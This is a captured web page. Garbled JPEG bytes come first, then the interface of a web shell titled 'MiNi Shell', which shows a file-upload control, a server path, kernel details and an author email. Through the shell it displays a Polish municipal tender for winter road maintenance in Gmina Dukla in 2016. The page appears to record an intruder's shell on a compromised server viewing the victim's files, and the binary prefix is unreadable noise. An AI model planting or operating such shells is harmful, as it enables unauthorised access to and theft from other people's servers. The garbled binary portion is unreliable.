JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151118/168395-N-2015.html

<p class="kh_header"><b>Dukla: Usługi zimowego utrzymania dróg gminnych i wewnętrznych (wiejskich) na terenie Gminy Dukla w roku 2016</b><br>
<b>Numer ogłoszenia: 168395 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dukla , ul. Trakt Węgierski 11, 38-450 Dukla, woj. podkarpackie, tel. 013 4329135, faks 013 4331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dukla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zimowego utrzymania dróg gminnych i wewnętrznych (wiejskich) na terenie Gminy Dukla w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: świadczenie usług w zakresie zimowego utrzymania dróg gminnych i wewnętrznych (wiejskich) w Gminie Dukla w 2016 roku. 2. Zimowe utrzymanie dróg - obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi tj. opady śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością. 3. Odśnieżanie - jest to usuwanie śniegu z jezdni i poboczy drogi w celu zapewnienia ciągłości ruchu. 4. Likwidacja śliskości - posypywanie piaskiem nawierzchni odśnieżonej drogi w szczególności na zakrętach, podjazdach, zjazdach, skrzyżowaniach oraz w zwartej zabudowie miejscowości. 5. Drogi gminne i wewnętrzne na terenie Gminy utrzymywane są w standardach IV, V i VI zimowego utrzymania dróg opracowanych podstawie Zarządzenia nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994 r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych STANDARDY ZIMOWEGO UTRZYMANIA DRÓG GMINNYCH. ZASADY ODŚNIEŻANIA I USUWANIA GOŁOLEDZI Standardy Opis stanu utrzymania drogi dla danego standardu. Dopuszczalne odstępstwa od standardu Po ustaniu opadów śniegu Od stwierdzenia wystąpienia zjawiska IV Jezdnia odśnieżona na całej szerokości. Jezdnia posypana na odcinkach decydujących o możliwości ruchu. - luźny - do 6 godz. - zajeżdżony - występuje - języki śniegowe - występują - zaspy - do 8 godz. Dopuszcza się przerwy w komunikacji do 8 godz. W miejscach wyznaczonych: - gołoledź - 8 godz. - śliskość pośniegowa - 10 godz. - lodowica - 8 godz. V Jezdnia odśnieżona, w miejscach zasp odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek Jezdnia posypana na odcinkach decydujących o możliwości ruchu. - luźny - do 16 godz. - zajeżdżony - występuje - nabój śnieżny - występuje - zaspy - do 24 godz. Dopuszcza się przerwy w komunikacji do 24 godz. W miejscach wyznaczonych: - gołoledź - 8 godz. - śliskość pośniegowa - występuje VI Jezdnia zaśnieżona. Prowadzi się interwencyjne odśnieżanie w zależności od potrzeb. Jezdnia posypana po odśnieżaniu w miejscach wyznaczonych przez zarząd drogi. - luźny - do 16 godz. - zajeżdżony - występuje - nabój śnieżny - występuje - zaspy - do 24 godz. Dopuszcza się przerwy w komunikacji do 24 godz. W miejscach wyznaczonych: - wszystkie rodzaje śliskości po odśnieżaniu 6. Zimowe utrzymanie dróg odbywać się będzie według podziału na 6 następujących Rejonów, składających się na 6 części zamówienia: REJON I : Nadole, Lipowica, Zboiska Cergowa. a) Nadole - droga gminna Nr 114514 R przez wieś ok.0,670 km, b) Lipowica - drogi wewnętrzne ok. 1,6 km. c) Zboiska - drogi wewnętrzne: tzw. stara droga ok. 0,250 km, droga od drogi krajowej w kierunku P. Belcika ok. 0,240 km. d) Cergowa - droga gminna Nr 114527 R Cergowa - przez wieś ok. 1,505 km, droga gminna Nr 114523 R Cergowa - Zboiska ok. 1,404 km. drogi wewnętrzne: do ŚDŚ i osiedlowe byłego Igloopolu ok.0,350 km. REJON II : Równe, Wietrzno, Łęki Dukielskie, Myszkowskie, Teodorówka. a) Równe - drogi gminne: Nr 114509 R Zapłocie, ul. Zenona Staronia ok. 2,461 km, droga gminna Nr 114508 R ul. Dworska ok. 0,479 km, Nr 114551 R ul. Akacjowa ok. 0,285 km, drogi wewnętrzne: ul. Tartaczna ok. 0,200 km, łącznik ul. Zenona Staronia z ul. Długą ok. 0,270 km, dojazd do remizy OSP ok. 0,050 km. b) Wietrzno - droga gminna: Nr 114506 R przez wieś k/DL ok. 1,791 km, Nr 114550 R do szkoły ok. 0,754 km, drogi wewnętrzne:, dojazd do remizy OSP ok. 0,020 km, dojazd na Sośniny ok.1,0 km. c) Łęki Dukielskie - drogi gminne: Nr 114503 R Zapłocie ok. 3,653 km, Nr 114504 R Łęki Dukielskie - Pałacówka ok. 3,354 km, Nr 114505 R Zboiska - Łazy ok. 1,605 km, dojazd do remizy OSP ok.0,050 km. d) Teodorówka - droga gminna: Nr 114513 R Wzgórze 534 ok. 2,824 km, droga wewnętrzna: k/ zbiornika p.poż. ok. 0,500 km. e) Łęki Dukielskie - Myszkowskie drogi gminne: Nr 114501 R ok.1,658 km, Nr 114502 R Łęki Dukielskie - Kobylany ok. 0,513 km. REJON III: Mszana, Tylawa, Barwinek, Zyndranowa. a) Mszana - drogi wewnętrzne: osiedlowe byłego Igloopolu, do sklepu, w kierunku P.Polaka, droga k/Cyglera - łącznie ok. 1,0 km, plac zajezdni dla autobusów. b) Tylawa - droga gminna: Nr 114534 R Tylawa |SKR ok.0,229 km dojazdowa do szkoły i plac zajezdni ok. 0,060 km, droga wewnętrzna za kościołem ok. 0,260 km, droga na Drymak ok. 0,700 km, droga w kierunku Smerecznego ok. 0,300 km; c) Barwinek - drogi wewnętrzne: w kierunku byłej Strażnicy ok. 0,700 km, droga Barwinek - Zyndranowa w kierunku zabudowań ok. 0,600 km, droga do DL - ok. 0,100 km. d) Zyndranowa - drogi wewnętrzne: droga za rzeką ok. 1,5 km droga w kierunku cmentarza ok. 0,200 km, wjazd do remizy OSP ok. 0,50 km. REJON IV: Głojsce, Iwla, Chyrowa, Olchowiec. a) Głojsce - drogi gminne: Nr 114510 R przez wieś ul. Nadbrzeżna i Ogrodowa ok.2,238 km, dojazd do remizy OSP ok. 0,05 km, plac manewrowy dla autobusów. b) Iwla - droga gminna: Nr 114512 R droga przez wieś ok.1,439 km, drogi wewnętrzne: droga k/cmentarza - do przysiółka Helenówka ok. 1,5 km dojazd do remizy OSP ok. 0,050 km. c) Chyrowa - droga gminna: Nr 114532 R droga przez wieś, odcinek ok.2,324 km. d) Olchowiec - drogi wewnętrzne: Kolonia ok. 3,0 km, dojazd do remizy OSP ok.0,050 km. REJON V: Nowa Wieś, Zawadka Rymanowska, Trzciana. a) Nowa Wieś - droga gminna przez wieś ok. 1,350 km. b) Zawadka Rymanowska - droga gminna Nr 114552 w kierunku byłego Igloopolu ok.2,0 km. c) Trzciana - droga wewnętrzna od krajowej w kierunku kościoła ok. 0,200 km. REJON VI : Jasionka. a) Jasionka - droga gminna przez wieś Nr 114526 R (3,161 km), Nr 114548 R droga do szkoły ok.0,163 km, Nr 114549 R droga k/kościoła ok. 0,582 km, dojazd do remizy OSP ok. 0,050 km. 7. Minimalne wymagania sprzętowe: Minimalne wymagania sprzętowe dotyczą: - odśnieżania; - piaskowania ; - odśnieżania i piaskowania (prowadzenia akcji w tym samym czasie). W Rejonach od I - IV Wykonawca musi wykazać się odpowiednim potencjałem technicznym, niezbędnym do realizacji zamówienia tj. minimum trzema jednostkami do odśnieżania, w tym dwoma jednostkami dwu napędowymi o mocy min. 70 KM. Pojazdy muszą być wyposażone w pług lemieszowy z gumową listwą zgarniającą, lub w pług wirnikowy. W rejonie V i VI Wykonawca musi wykazać się odpowiednim potencjałem technicznym, niezbędnym do realizacji zamówienia tj. minimum dwoma jednostkami w tym jednostka, dwunapędowa o mocy min. 70 KM, wyposażona w pług lemieszowy z gumową listwą zgarniającą lub w pług wirnikowy. 8. Do wykonania przedmiotu zamówienia Wykonawca użyje sprzętu wyposażonego i oznakowanego wg wymogów prawa o ruchu drogowym oraz zgodnie z przepisami BHP. 9. Zamawiający dopuszcza możliwość udziału podwykonawców w zamówieniu. 10. W dniu podpisania umowy Wykonawca zobowiązany jest do udokumentowania sprawności posiadanego sprzętu oraz mocy z dowodu rejestracyjnego lub innego dokumentu potwierdzającego parametry techniczne pojazdu oraz przedłożenia ubezpieczenia komunikacyjnego OC dla danego sprzętu. 11. Opis sposobu obliczenia ceny: Kryterium wyboru oferty będzie cena brutto za 1 godzinę usługi, sprzętem spełniającym minimalne wymagania sprzętowe, według określonych wyżej wymagań dla poszczególnych Rejonów. Stawka obejmuje również koszt dojazdu i zjazdu z miejsca świadczenia usługi. 12. W pierwszej kolejności planem zimowego utrzymaniu dróg gminnych podlegają publiczne drogi gminne (oznaczone sześciocyfrowym numerem ewidencyjnym) oraz dojazdy do obiektów gminnych, ośrodków zdrowia, punktów lekarskich szkół itp. Drogi te podlegają utrzymaniu w IV standardzie, który zobowiązuje wykonawcę do odśnieżania jezdni na całej szerokości i posypywania na odcinkach decydujących o możliwościach ruchu. 13. W drugiej kolejności odśnieżane będą drogi wewnętrzne mające znaczenie komunikacyjne, stanowiące dojazd do większych skupisk zabudowań. Drogi te zostały objęte V i VI standardem zimowego utrzymania. 14. Pozostałe drogi wewnętrzne nie wymienione w planie, będą odśnieżane interwencyjnie na podstawie zgłoszeń sołtysów poszczególnych miejscowości, tylko w sytuacjach wystąpienia dużych opadów śniegu, uniemożliwiających dojazd oraz w miarę posiadanych środków finansowych Gminy. 15. W przypadkach występujących skrajnie niekorzystnych i nieustabilizowanych warunków atmosferycznych zawieje i zamiecie śnieżne, długotrwałe burze śnieżne niweczące efekty odśnieżania dróg, gdy praca sprzętu nie będzie możliwa utrzymanie dróg zostanie wstrzymane i wznowione po ustaniu niekorzystnego zjawiska atmosferycznego. 16. Usługi odśnieżania będą realizowane w miarę potrzeb Zamawiającego i panujących warunków atmosferycznych (opadów śniegu), każdorazowo na telefoniczne zlecenie sołtysa danej miejscowości lub merytorycznego pracownika Urzędu Miejskiego w Dukli. 17. Wykonawca zobowiązany jest do zapewnienia swojej gotowości do prowadzenia zimowego utrzymania dróg od 1 stycznia do 31 grudnia 2015 roku. 18. Wymaga się aby Wykonawca był gotowy do świadczenia usług we wszystkie dni tygodnia i rozpoczął odśnieżanie w ciągu 1 godziny od telefonicznego zgłoszenia. 19. Drogi gminne publiczne należy odśnieżyć do godz. 6:00. 20. Śliskość zimowa będzie zwalczana przez Wykonawcę, przy użyciu własnych materiałów szorstkich tj. piasku, lub mieszanki piasku z solą, na odcinkach decydujących o możliwości ruchu takich jak niebezpieczne łuki podjazdy. Usuwanie i zwalczanie śliskości powinno odbywać się w miarę zaistniałych potrzeb ( opady marznącego śniegu, mżawki). Koszt materiałów do zwalczania śliskości należy uwzględnić w cenie jednostkowej pracy sprzętu. 21. Utrzymanie przejezdności dróg uwarunkowane jest ograniczonymi środkami finansowymi w budżecie Gminy Dukla. W przypadku zaistnienia bardzo intensywnych opadów śniegu i zamieci śnieżnych istnieje prawdopodobieństwo braku przejezdności niektórych odcinków dróg. 22. Z uwagi na usytuowanie niektórych odcinków dróg gminnych przewidzianych do zimowego utrzymania, interwencje obejmujące zimowe utrzymanie będą uzależnione od przejezdności przez drogi powiatowe i wojewódzkie. 23. Zamawiający wymaga aby w czasie prowadzenia akcji możliwa była bezpośrednia łączność Zamawiającego z operatorami (telefon komórkowy). 24. Po rozpoczęciu usługi Wykonawca zobowiązany jest do dokumentowania swojej pracy na kartach pracy sprzętu. W kartach muszą być prowadzone co najmniej zapisy o godzinach, dacie i miejscu pracy sprzętu ( droga, plac), stanie utrzymania dróg i o utrudnieniach występujących na nich. 25. Odbiór wykonanej usługi wymaga pisemnego potwierdzenia kart pracy przez sołtysa wsi, w której odśnieżana jest droga. 26. Wykonawca zobowiązany jest do składania telefonicznej informacji o liczbie godzin świadczonej usługi, w danym dniu i na danej drodze z określeniem miejsca wykonywania usługi w każdy poniedziałek za ubiegły tydzień w godzinach od 7:00-15:00 pod nr telefonu (13) 43 29 134. 28. Zgłoszenia dotyczące utrudnień w komunikacji, związanych z opadami śniegu i śliskością zimową na drogach gminnych, wiejskich, których zarządcą jest Gmina Dukla, należy kierować do pracownika merytorycznego Urzędu Miejskiego w Dukli, Wydział Gospodarczy Tel, 13 43 29 134. 28. Oferent zobowiązany jest do zapoznania się ze standardami zimowego utrzymania dróg, techniką i technologią prowadzenia robót zimowego utrzymania dróg, zapoznać się z warunkami związanymi z wykonaniem usługi będącej przedmiotem zamówienia w celu zdobycia wszelkich informacji, które mogą być konieczne do wykonania prawidłowej wyceny wartości usługi i przygotowania oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-8, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W Rejonach od I - IV Wykonawca musi wykazać się odpowiednim potencjałem technicznym, niezbędnym do realizacji zamówienia tj. minimum trzema jednostkami do odśnieżania,  w tym dwoma jednostkami dwu napędowymi o mocy min. 70 KM. Pojazdy muszą być wyposażone w pług  lemieszowy z gumową listwą zgarniającą, lub w  pług wirnikowy. 

W rejonie V i VI Wykonawca musi wykazać się odpowiednim potencjałem technicznym, niezbędnym do realizacji zamówienia tj. minimum dwoma jednostkami w tym jednostka,  dwunapędowa o mocy min. 70 KM, wyposażona w pług lemieszowy z gumową listwą zgarniającą lub w   pług wirnikowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oferta przetargowa wg Załącznika Nr 1 do SIWZ, 
b)	oświadczenie o spełnieniu warunków  art. 22 ust. 1 i art. 24 ust. 1 Pzp wg Załącznika Nr 2 do SIWZ   - Zał. Nr 1 do oferty,
c)	oświadczenie o podwykonawcach, w przypadku braku podwykonawców w realizacji zadania również oświadczenie o braku podwykonawców (art.36 ust5 Pzp ) wg Załącznika Nr 3 do SIWZ   - Zał. Nr 2  do oferty,
d)	oświadczenie o grupach kapitałowych w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U Nr 50 , poz.331, z późn. zm.) wg Załącznika Nr 4 do SIWZ   - Zał. Nr 3  do oferty,
e)	zaakceptowany i wypełniony przez wykonawcę projekt umowy wg Załącznika Nr 5do SIWZ   - Zał. Nr 4 do oferty,
f)	wykaz urządzeń dostępnych Wykonawcy w celu realizacji zamówienia  wg Załącznika Nr 6 do SIWZ     - Zał. Nr 5 do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Liczba sprzętu - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT;
c)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy ;
d)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dukla.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2015 godzina 08:00, miejsce: Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com